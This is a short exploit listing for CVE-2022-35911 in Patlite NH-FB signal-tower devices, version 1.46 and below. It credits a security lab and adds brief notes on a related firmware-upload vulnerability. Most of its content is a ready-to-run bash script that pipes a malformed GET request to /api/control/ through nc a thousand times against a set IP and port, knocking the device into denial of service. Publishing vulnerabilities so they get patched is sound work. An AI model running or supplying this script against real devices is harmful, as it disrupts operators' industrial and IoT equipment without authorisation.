Headline
Patlite 1.46 Buffer Overflow
Patlite versions 1.45 and below suffer from a buffer overflow vulnerability.
# Exploit Title: CVE-2022-35911 - Patlite Overflow.# Date: 2022-07-07# Exploit Author: Samy Younsi - Necrum Security Labs# Vendor Homepage: https://www.patlite.co.jp# Software Link: https://www.patlite.co.jp/product/detail0000021462.html# Version: Versions 1.46 and bellow are affected# Tested on: CentOs & Ubuntu# CVE : CVE-2022-35911#!/bin/bashIP="192.168.1.101"PORT="80"for i in {0..1000}; do echo "[$i]: "; echo -ne "GET /api/control/AAAAAAAAAAAAAAAAAA HTTP/1.1\r\nHost: $IP\r\n\r\n" | nc $IP $PORT; done > /dev/null 2>&1Related news
CVE-2022-38625: Patlite-NH-FB.md
Patlite NH-FB v1.46 and below was discovered to contain insufficient firmware validation during the upgrade firmware file upload process. This vulnerability allows authenticated attackers to create and upload their own custom-built firmware and inject malicious code.
CVE-2022-35911: PATLITE / IoT / 見える化|PATLITE
On Patlite NH-FB series devices through 1.46, remote attackers can cause a denial of service by omitting the query string.